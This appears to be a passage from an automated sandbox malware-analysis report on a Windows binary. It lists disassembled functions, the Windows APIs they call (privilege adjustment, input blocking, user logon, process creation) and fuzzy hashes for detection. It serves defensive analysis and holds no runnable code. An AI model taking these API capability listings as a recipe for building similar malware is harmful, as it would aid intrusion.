                          • Associated: 00000000.00000002.2919870370.0000000000BF5000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2919870370.0000000000C7D000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2920360041.0000000000C83000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2920432807.0000000000C84000.00000004.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_b00000_bf-p2b.jbxd
                          Similarity
                          • API ID: ErrorFormatLastMessage
                          • String ID:
                          • API String ID: 3479602957-0
                          • Opcode ID: ca949bd16a1eb5c87572926e1fbbf71ab002d80cfc5547e9255fe7bdfd56f776
                          • Instruction ID: 4e554bef33b2059c9f9b9af7c02a7ead3eb651eeee032373442aa2bc40fd02a6
                          • Opcode Fuzzy Hash: ca949bd16a1eb5c87572926e1fbbf71ab002d80cfc5547e9255fe7bdfd56f776
                          • Instruction Fuzzy Hash: 28F08C3510032DABDB21AFA4CC89FEA7BACAF49361F008196B909D6191D7309A40DBA0
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 00B3B8B0 Relevance: 3.0, APIs: 2, Instructions: 22COMMON
                          Download Yara Rule
                          APIs
                          • AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,00000000,00000000,00000000), ref: 00B3B8C5
                          • CloseHandle.KERNEL32(?), ref: 00B3B8D7
                          Memory Dump Source
                          • Source File: 00000000.00000002.2919870370.0000000000B01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B00000, based on PE: true
                          • Associated: 00000000.00000002.2919797498.0000000000B00000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2919870370.0000000000BAE000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2919870370.0000000000BBA000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2919870370.0000000000BF5000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2919870370.0000000000C7D000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2920360041.0000000000C83000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2920432807.0000000000C84000.00000004.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_b00000_bf-p2b.jbxd
                          Similarity
                          • API ID: AdjustCloseHandlePrivilegesToken
                          • String ID:
                          • API String ID: 81990902-0
                          • Opcode ID: 4af746d8dc52a0cfaca7ec3cd81501ac16b8a2d15ccc08a9a196fb125420f411
                          • Instruction ID: d220e280705335fd18be6739a3743659bddf4b56e3ef74f2cf7e66b4d2eed6fe
                          • Opcode Fuzzy Hash: 4af746d8dc52a0cfaca7ec3cd81501ac16b8a2d15ccc08a9a196fb125420f411
                          • Instruction Fuzzy Hash: 75E0E671014511AFE7263B50FC09D7777EDEF04311B10845EF55995471DB615CD0DB10
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 00B6F594 Relevance: 3.0, APIs: 2, Instructions: 21nativeCOMMON
                          Download Yara Rule
                          APIs
                          • GetWindowLongW.USER32(?,000000EC), ref: 00B6F59C
                          • NtdllDialogWndProc_W.NTDLL(?,00000084,00000000,?,?,00B7F3AD,?,?,?,?), ref: 00B6F5C6
                          Memory Dump Source
                          • Source File: 00000000.00000002.2919870370.0000000000B01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B00000, based on PE: true
                          • Associated: 00000000.00000002.2919797498.0000000000B00000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2919870370.0000000000BAE000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2919870370.0000000000BBA000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2919870370.0000000000BF5000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2919870370.0000000000C7D000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2920360041.0000000000C83000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2920432807.0000000000C84000.00000004.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_b00000_bf-p2b.jbxd
                          Similarity
                          • API ID: DialogLongNtdllProc_Window
                          • String ID:
                          • API String ID: 2065330234-0
                          • Opcode ID: 0f3b392aab6c6f0f6dec5362fe165d9996bd7e6b53a248b160a43ab9d51686d8
                          • Instruction ID: d6fc73283234825a7144e1b13fa90945ea7900047a1011a99e7497775d8ec5ec
                          • Opcode Fuzzy Hash: 0f3b392aab6c6f0f6dec5362fe165d9996bd7e6b53a248b160a43ab9d51686d8
                          • Instruction Fuzzy Hash: DBE08C30104219BBEB140F09EC0AFB93B58EB10B50F10852BF917890E0EBB488A0D760
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 00B28E3C Relevance: 3.0, APIs: 2, Instructions: 8COMMONLIBRARYCODE
                          Download Yara Rule
                          APIs
                          • SetUnhandledExceptionFilter.KERNEL32(00000000,00B0125D,00B27A43,00B00F35,?,?,00000001), ref: 00B28E41
                          • UnhandledExceptionFilter.KERNEL32(?,?,?,00000001), ref: 00B28E4A
                          Memory Dump Source
                          • Source File: 00000000.00000002.2919870370.0000000000B01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B00000, based on PE: true
                          • Associated: 00000000.00000002.2919797498.0000000000B00000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2919870370.0000000000BAE000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2919870370.0000000000BBA000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2919870370.0000000000BF5000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2919870370.0000000000C7D000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2920360041.0000000000C83000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2920432807.0000000000C84000.00000004.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_b00000_bf-p2b.jbxd
                          Similarity
                          • API ID: ExceptionFilterUnhandled
                          • String ID:
                          • API String ID: 3192549508-0
                          • Opcode ID: 971bb488c2c50e64f4a9a4aa0863ce4b88a3c8665853e3946b3df2c3db3d35c2
                          • Instruction ID: 4b48a25e84ed5851d957074d1d136e5cc5b2ef5ea273bd5ddb5fe39ed96ca8b2
                          • Opcode Fuzzy Hash: 971bb488c2c50e64f4a9a4aa0863ce4b88a3c8665853e3946b3df2c3db3d35c2
                          • Instruction Fuzzy Hash: CBB09271044B08EBEA002BA1EC09B883F78EB08A62F004022F61D460B08F635450CB9A
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 00B3113E Relevance: 1.8, APIs: 1, Instructions: 294COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000000.00000002.2919870370.0000000000B01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B00000, based on PE: true
                          • Associated: 00000000.00000002.2919797498.0000000000B00000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2919870370.0000000000BAE000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2919870370.0000000000BBA000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2919870370.0000000000BF5000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2919870370.0000000000C7D000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2920360041.0000000000C83000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2920432807.0000000000C84000.00000004.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_b00000_bf-p2b.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: b339df5db4d1ef5e9701baade962acb378d732c254a5cf4db5feb7e260b86698
                          • Instruction ID: 7324cf3adcb719adfa2445dba4cfd6a589acdbce5193e769e1702bf6aa4ff20d
                          • Opcode Fuzzy Hash: b339df5db4d1ef5e9701baade962acb378d732c254a5cf4db5feb7e260b86698
                          • Instruction Fuzzy Hash: 65B10320D6AF404DD72396398931336B79CAFBB2C5F92D71BFC1A75D22EB2185934280
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 00B4BFB8 Relevance: 1.6, APIs: 1, Instructions: 71COMMON
                          Download Yara Rule
                          APIs
                          • __time64.LIBCMT ref: 00B4BFCB
                            • Part of subcall function 00B240DA: GetSystemTimeAsFileTime.KERNEL32(00000000,?,?,?,00B4C6AF,00000000,?,?,?,?,00B4C85C,00000000,?), ref: 00B240E3
                            • Part of subcall function 00B240DA: __aulldiv.LIBCMT ref: 00B24103
                          Memory Dump Source
                          • Source File: 00000000.00000002.2919870370.0000000000B01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B00000, based on PE: true
                          • Associated: 00000000.00000002.2919797498.0000000000B00000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2919870370.0000000000BAE000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2919870370.0000000000BBA000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2919870370.0000000000BF5000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2919870370.0000000000C7D000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2920360041.0000000000C83000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2920432807.0000000000C84000.00000004.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_b00000_bf-p2b.jbxd
                          Similarity
                          • API ID: Time$FileSystem__aulldiv__time64
                          • String ID:
                          • API String ID: 2893107130-0
                          • Opcode ID: 2a512d36426250f63093c4824946675dcf091365e3c2a2bbb9667a6f6adbf225
                          • Instruction ID: f5769f979503cb5035e2de94118f9b4066c05fa0e397ea045e2de636d3d3dd08
                          • Opcode Fuzzy Hash: 2a512d36426250f63093c4824946675dcf091365e3c2a2bbb9667a6f6adbf225
                          • Instruction Fuzzy Hash: C521B732634510CBC729CF29C881E92B7E5EB59310B648E6DE0E5CB2C0CB74BA05DB54
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 00B702AA Relevance: 1.6, APIs: 1, Instructions: 64nativeCOMMON
                          Download Yara Rule
                          APIs
                            • Part of subcall function 00B1AF7D: GetWindowLongW.USER32(?,000000EB), ref: 00B1AF8E
                          • NtdllDialogWndProc_W.NTDLL(?,00000112,?,?), ref: 00B70352
                          Memory Dump Source
                          • Source File: 00000000.00000002.2919870370.0000000000B01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B00000, based on PE: true
                          • Associated: 00000000.00000002.2919797498.0000000000B00000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2919870370.0000000000BAE000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2919870370.0000000000BBA000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2919870370.0000000000BF5000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2919870370.0000000000C7D000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2920360041.0000000000C83000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2920432807.0000000000C84000.00000004.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_b00000_bf-p2b.jbxd
                          Similarity
                          • API ID: DialogLongNtdllProc_Window
                          • String ID:
                          • API String ID: 2065330234-0
                          • Opcode ID: 5cf98654f99e66b698fe232436b5fd1de845c888809fbfc8eeb9ce16ded89df8
                          • Instruction ID: ded66a7756afda3ff85a6405d78efb1b75b3195331276654643c29283fad9554
                          • Opcode Fuzzy Hash: 5cf98654f99e66b698fe232436b5fd1de845c888809fbfc8eeb9ce16ded89df8
                          • Instruction Fuzzy Hash: F5113A31214215FBFB246B2CCC45FB93BD4E749720F24C3A6F9355A1E2CA649D40D2A9
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 00B6FE80 Relevance: 1.5, APIs: 1, Instructions: 46nativeCOMMON
                          Download Yara Rule
                          APIs
                            • Part of subcall function 00B1B155: GetWindowLongW.USER32(?,000000EB), ref: 00B1B166
                          • NtdllDialogWndProc_W.NTDLL(?,00000115,?,?,?,?,?,?,00B7F36A,?,?,?,?,00000000,?), ref: 00B6FEF8
                          Memory Dump Source
                          • Source File: 00000000.00000002.2919870370.0000000000B01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B00000, based on PE: true
                          • Associated: 00000000.00000002.2919797498.0000000000B00000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2919870370.0000000000BAE000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2919870370.0000000000BBA000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2919870370.0000000000BF5000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2919870370.0000000000C7D000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2920360041.0000000000C83000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2920432807.0000000000C84000.00000004.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_b00000_bf-p2b.jbxd
                          Similarity
                          • API ID: DialogLongNtdllProc_Window
                          • String ID:
                          • API String ID: 2065330234-0
                          • Opcode ID: 0b7143589e0dcfc83ed52cbc71f54b53b9f62c047c19dfa629570dcd9cb87211
                          • Instruction ID: e5dc59e541b72fa70eeadf12988b40069eb95f3afd000558ef048db17566d342
                          • Opcode Fuzzy Hash: 0b7143589e0dcfc83ed52cbc71f54b53b9f62c047c19dfa629570dcd9cb87211
                          • Instruction Fuzzy Hash: D501B532A0011A6BDB149E18E849FF63FD2EB46324F1445B5F919575B3C7366C50D7A0
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 00B6EA4E Relevance: 1.5, APIs: 1, Instructions: 29nativeCOMMON
                          Download Yara Rule
                          APIs
                            • Part of subcall function 00B1AF7D: GetWindowLongW.USER32(?,000000EB), ref: 00B1AF8E
                            • Part of subcall function 00B1B736: GetCursorPos.USER32(000000FF), ref: 00B1B749
                            • Part of subcall function 00B1B736: ScreenToClient.USER32(00000000,000000FF), ref: 00B1B766
                            • Part of subcall function 00B1B736: GetAsyncKeyState.USER32(00000001), ref: 00B1B78B
                            • Part of subcall function 00B1B736: GetAsyncKeyState.USER32(00000002), ref: 00B1B799
                          • NtdllDialogWndProc_W.NTDLL(?,00000204,?,?,00000001,?,?,?,00B7F417,?,?,?,?,?,00000001,?), ref: 00B6EA9C
                          Memory Dump Source
                          • Source File: 00000000.00000002.2919870370.0000000000B01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B00000, based on PE: true
                          • Associated: 00000000.00000002.2919797498.0000000000B00000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2919870370.0000000000BAE000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2919870370.0000000000BBA000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2919870370.0000000000BF5000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2919870370.0000000000C7D000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2920360041.0000000000C83000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2920432807.0000000000C84000.00000004.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_b00000_bf-p2b.jbxd
                          Similarity
                          • API ID: AsyncState$ClientCursorDialogLongNtdllProc_ScreenWindow
                          • String ID:
                          • API String ID: 2356834413-0
                          • Opcode ID: 7d0fd5bbd325c1372a1b7352f49ba08dc109c803408d104c05f1dab63739dcdd
                          • Instruction ID: e2b7efb8d8ce037de6e6b42a0ae95c72b0b46628c40dba8cb695e7045143da5e
                          • Opcode Fuzzy Hash: 7d0fd5bbd325c1372a1b7352f49ba08dc109c803408d104c05f1dab63739dcdd
                          • Instruction Fuzzy Hash: E5F0A735204219ABDB146F59DC05EFE3FA1FB01750F004055F9161B1E2D776D9A1DBD1
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 00B1B7F2 Relevance: 1.5, APIs: 1, Instructions: 28nativeCOMMON
                          Download Yara Rule
                          APIs
                            • Part of subcall function 00B1AF7D: GetWindowLongW.USER32(?,000000EB), ref: 00B1AF8E
                          • NtdllDialogWndProc_W.NTDLL(?,00000006,?,?,?,?,00B1AF40,?,?,?,?,?), ref: 00B1B83B
                          Memory Dump Source
                          • Source File: 00000000.00000002.2919870370.0000000000B01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B00000, based on PE: true
                          • Associated: 00000000.00000002.2919797498.0000000000B00000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2919870370.0000000000BAE000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2919870370.0000000000BBA000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2919870370.0000000000BF5000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2919870370.0000000000C7D000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2920360041.0000000000C83000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2920432807.0000000000C84000.00000004.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_b00000_bf-p2b.jbxd
                          Similarity
                          • API ID: DialogLongNtdllProc_Window
                          • String ID:
                          • API String ID: 2065330234-0
                          • Opcode ID: 585d51cf949709d87c9b7a133b1b38a6438c314e8fad13fd265c4511e2ab5763
                          • Instruction ID: b8151af0a589c830349df60f6c41d6c08a9d661e8d2e6ce1cc02ef30863122c0
                          • Opcode Fuzzy Hash: 585d51cf949709d87c9b7a133b1b38a6438c314e8fad13fd265c4511e2ab5763
                          • Instruction Fuzzy Hash: 9EF05E31604209DFDB189F18DC90E793BE6FB16360F908669F9524B2A1DB71D8A0DB90
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 00B5703C Relevance: 1.5, APIs: 1, Instructions: 25keyboardCOMMON
                          Download Yara Rule
                          APIs
                          • BlockInput.USER32(00000001), ref: 00B57057
                          Memory Dump Source
                          • Source File: 00000000.00000002.2919870370.0000000000B01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B00000, based on PE: true
                          • Associated: 00000000.00000002.2919797498.0000000000B00000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2919870370.0000000000BAE000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2919870370.0000000000BBA000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2919870370.0000000000BF5000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2919870370.0000000000C7D000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2920360041.0000000000C83000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2920432807.0000000000C84000.00000004.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_b00000_bf-p2b.jbxd
                          Similarity
                          • API ID: BlockInput
                          • String ID:
                          • API String ID: 3456056419-0
                          • Opcode ID: ab4a02af3073c43f7d6237e3ae9f3fa736e7305728b0af07404e990a9b4fb6ea
                          • Instruction ID: 0497eba9e1f68ee2bb6bdf99fdf2393079cff6ede9b2740127d85787d2ecf653
                          • Opcode Fuzzy Hash: ab4a02af3073c43f7d6237e3ae9f3fa736e7305728b0af07404e990a9b4fb6ea
                          • Instruction Fuzzy Hash: 10E012353442049FC710ABA9D444A96B7DDAF54751F0484A6A945D7291DAB0E8448B90
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 00B6F3DA Relevance: 1.5, APIs: 1, Instructions: 24nativeCOMMON
                          Download Yara Rule
                          APIs
                          • NtdllDialogWndProc_W.NTDLL(?,00000232,?,?), ref: 00B6F41A
                          Memory Dump Source
                          • Source File: 00000000.00000002.2919870370.0000000000B01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B00000, based on PE: true
                          • Associated: 00000000.00000002.2919797498.0000000000B00000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2919870370.0000000000BAE000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2919870370.0000000000BBA000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2919870370.0000000000BF5000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2919870370.0000000000C7D000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2920360041.0000000000C83000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2920432807.0000000000C84000.00000004.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_b00000_bf-p2b.jbxd
                          Similarity
                          • API ID: DialogNtdllProc_
                          • String ID:
                          • API String ID: 3239928679-0
                          • Opcode ID: 0b299cc0c34548121d7a2e03189531f287a054f8679d2cfd39f733f6f202bd9a
                          • Instruction ID: aa6de3e5fbeb444e3480ffd7f52f6a61982e4d9c131dbb90bce615fef92662a0
                          • Opcode Fuzzy Hash: 0b299cc0c34548121d7a2e03189531f287a054f8679d2cfd39f733f6f202bd9a
                          • Instruction Fuzzy Hash: AFF06D32204249AFDB21DF5CDC05FD63B95FB0A360F144459BA11672E2CF70A820D7A4
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 00B47DD5 Relevance: 1.5, APIs: 1, Instructions: 24COMMON
                          Download Yara Rule
                          APIs
                          • mouse_event.USER32(00000002,00000000,00000000,00000000,00000000), ref: 00B47DF8
                          Memory Dump Source
                          • Source File: 00000000.00000002.2919870370.0000000000B01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B00000, based on PE: true
                          • Associated: 00000000.00000002.2919797498.0000000000B00000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2919870370.0000000000BAE000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2919870370.0000000000BBA000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2919870370.0000000000BF5000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2919870370.0000000000C7D000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2920360041.0000000000C83000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2920432807.0000000000C84000.00000004.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_b00000_bf-p2b.jbxd
                          Similarity
                          • API ID: mouse_event
                          • String ID:
                          • API String ID: 2434400541-0
                          • Opcode ID: 8ddb379f4ce3c6f0d51a4b19d337dd78b446c63b62ff209c2bbaabf2aa335a91
                          • Instruction ID: 516c6cfce9a4bda9f336225fa0464a637d818bf1732c37804f9fe5e17bdde613
                          • Opcode Fuzzy Hash: 8ddb379f4ce3c6f0d51a4b19d337dd78b446c63b62ff209c2bbaabf2aa335a91
                          • Instruction Fuzzy Hash: 2DD09EE59FCA0679FD1917209C2FF7A1288EB51781FA456EAB101C60C1EF906A44F535
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 00B6F425 Relevance: 1.5, APIs: 1, Instructions: 18nativeCOMMON
                          Download Yara Rule
                          APIs
                          • NtdllDialogWndProc_W.NTDLL(?,00000053,?,?,?,00B7F3D4,?,?,?,?,?,?), ref: 00B6F450
                            • Part of subcall function 00B6E13E: _memset.LIBCMT ref: 00B6E14D
                            • Part of subcall function 00B6E13E: _memset.LIBCMT ref: 00B6E15C
                            • Part of subcall function 00B6E13E: CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,00000020,00000000,00000000,00BC3EE0,00BC3F24), ref: 00B6E18B
                            • Part of subcall function 00B6E13E: CloseHandle.KERNEL32 ref: 00B6E19D
                          Memory Dump Source
                          • Source File: 00000000.00000002.2919870370.0000000000B01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B00000, based on PE: true
                          • Associated: 00000000.00000002.2919797498.0000000000B00000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2919870370.0000000000BAE000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2919870370.0000000000BBA000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2919870370.0000000000BF5000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2919870370.0000000000C7D000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2920360041.0000000000C83000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2920432807.0000000000C84000.00000004.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_b00000_bf-p2b.jbxd
                          Similarity
                          • API ID: _memset$CloseCreateDialogHandleNtdllProc_Process
                          • String ID:
                          • API String ID: 2364484715-0
                          • Opcode ID: c1b629f1560f112b0c45cae7fc183dac1ac90ffc8f34300951476d607f133197
                          • Instruction ID: 3ddda50742c035b7215ed110132aa8a01c1151ecbeb0ef71bbec5ce6f89b86b5
                          • Opcode Fuzzy Hash: c1b629f1560f112b0c45cae7fc183dac1ac90ffc8f34300951476d607f133197
                          • Instruction Fuzzy Hash: 5BE04632110209DFCB01EF08EC44EA637A2FB09340F008091FA00676B2CB31ED20EF50
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 00B1AC99 Relevance: 1.5, APIs: 1, Instructions: 18nativeCOMMON
                          Download Yara Rule
                          APIs
                            • Part of subcall function 00B1AF7D: GetWindowLongW.USER32(?,000000EB), ref: 00B1AF8E
                          • NtdllDialogWndProc_W.NTDLL(?,00000007,?,00000000,00000000,?,?), ref: 00B1ACC7
                          Memory Dump Source
                          • Source File: 00000000.00000002.2919870370.0000000000B01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B00000, based on PE: true
                          • Associated: 00000000.00000002.2919797498.0000000000B00000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2919870370.0000000000BAE000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2919870370.0000000000BBA000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2919870370.0000000000BF5000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2919870370.0000000000C7D000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2920360041.0000000000C83000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2920432807.0000000000C84000.00000004.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_b00000_bf-p2b.jbxd
                          Similarity
                          • API ID: DialogLongNtdllProc_Window
                          • String ID:
                          • API String ID: 2065330234-0
                          • Opcode ID: f3672c83ef48e9ea16446ad9af0afe7f305207bc2daaeebe4262993109c201fc
                          • Instruction ID: b5bf34013b0f9ed2abefcc79df9fbf767ac7797fdc9abf47019a859b1247eec7
                          • Opcode Fuzzy Hash: f3672c83ef48e9ea16446ad9af0afe7f305207bc2daaeebe4262993109c201fc
                          • Instruction Fuzzy Hash: 21E0EC36104208FBCF05AF94DC51EA83B66FB49354F508459F6055B6A2CA32E562EB91
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 00B3BE95 Relevance: 1.5, APIs: 1, Instructions: 18COMMON
                          Download Yara Rule
                          APIs
                          • LogonUserW.ADVAPI32(?,00000001,?,?,00000000,00B3BA6A), ref: 00B3BEB3
                          Memory Dump Source
                          • Source File: 00000000.00000002.2919870370.0000000000B01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B00000, based on PE: true
                          • Associated: 00000000.00000002.2919797498.0000000000B00000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2919870370.0000000000BAE000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2919870370.0000000000BBA000.00000040.00000001.01000000.00000003.sdmpDownload File
